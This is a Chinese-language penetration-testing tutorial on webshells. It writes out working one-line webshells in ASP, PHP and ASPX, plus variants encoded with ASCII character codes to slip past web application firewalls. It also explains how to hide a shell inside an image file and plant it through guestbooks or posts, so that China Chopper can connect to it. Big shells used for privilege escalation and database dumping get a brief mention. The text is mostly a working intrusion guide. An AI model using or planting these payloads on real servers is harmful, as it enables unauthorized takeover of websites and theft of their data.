web 渗透【4】脚本马的制作与原理

webshell制作原理

　　webshell种类

　　　　一句话马（使用的最多）、小马、大马、打包马、脱裤马、、、

　　一句话：

　　　　介绍：短小精悍，并且功能强大、隐蔽性非常好，在入侵种始终扮演着非常重要的角色

　　　　e.g：<%execute request("value")%>

　　　　解释：

　　　　execute：是一个执行函数，用来执行该命令

　　　　request：是接收提交方式，可接受post型、get型、cookie型的传参

　　　　value：是参数，也是我们用菜刀连接时的密码

　　　　http://www.xx.com/x.asp?value=　　以这种方式接收命令

　　　　用菜刀连接时如下：　

　　常见写法：

　　　　asp一句话：

　　　　<%eval request("pv")%>

　　　　PHP一句话：

　　　　<?php eval($_POST[a])?>

　　　　aspx一句话：

　　　　<%@ Page Language="Jscript"%><%eval(Request.Item["mima"],"unsafe");%>

　　　　jsp一句话：（也是一种小马）

　　一句话马的变形（为了绕过waf）

　　　　<?php $_REQUEST['a']($_REQUEST['b']);?>　　这种方式已经淘汰了用不了了

　　　　这个语句中没有执行函数，只有两个接收函数，使用的时候对参数a传递执行函数　　/x.php?a=eval 　　然后再用菜刀连接

　　　　<%Eval((Request(char(112))))%>

　　　　用ascii码转码，不再使用单引号、双引号，防止闭合

　　　　<%eval(eval(char(114)+char(101)+char(113)+char(117)+char(101)+char(115)+char(116)("xindong")%>

　　　　用ascii码转码，不再使用单引号、双引号，防止闭合（asp用+号连接，php用.号连接）

　　　　<%a=request("gold")%><%eval a%>

　　一句话图片马制作（隐写，建议使用搭建网站的素材图片）

　　　　c32或winhex做一句话

　　　　　　用该软件打开图片，讲一句话代码放在最后面保存

　　　　cmd下做一句话

　　　　　　copy /d 1.jpg+1.asp 2.jpg　　不建议

　　　　也可以在图片属性中的详细信息中添加一句话（版权中）

　　常见的一句话客户端

　　　　一句话客户端增强版

　　　　中国菜刀　　右后门　　菜刀上传大马1，再删除菜刀码，大马1上传大马2，删除大马1，要脱三次

　　　　中国砍刀

　　　　lanker一句话客户端

　　　　zv新型PHP一句话客户端GUI版

　　小马

　　　　体积小，易隐蔽，最重要的是与图片结合在一起上传后可以利用nginx或者iis6的解析漏洞来运行，不过功能少，一般只用来上传大马

　　大马

　　　　体积大，50K大小左右，功能多，一般包括提权命令，磁盘管理，数据库连接接口，执行命令甚至有些具备自带的提权功能和压缩，解压缩网站程序功能，隐蔽性不好，而且大多数代码不加密或被查杀。

一句话的使用

　　　　首先，找到数据库是asp格式的网站，然后，以留言板或者发表文章的方式，把一句话添加到数据库，或者网页。我们的目的是把一句话添加到数据库，无论任何方式。然后菜刀连接。

　　小马使用

　　　　主要用来上传大马

　　大马使用

　　　　提权、打包、脱裤、增删文件、、、

　　使用技巧

　　　　内容编码、配合解析漏洞、配合文件包含、利用文件名溢出

　　文件包含代码，放在b.asp

　　 conn.asp 就是要包含的文件

　　使用的时候直接访问b.asp，就会加载conn.asp文件

webshell“黑吃黑”

　　找shell后门

　　　　查找后门、查找webshell后门、找到后门地址、返搞webshell箱子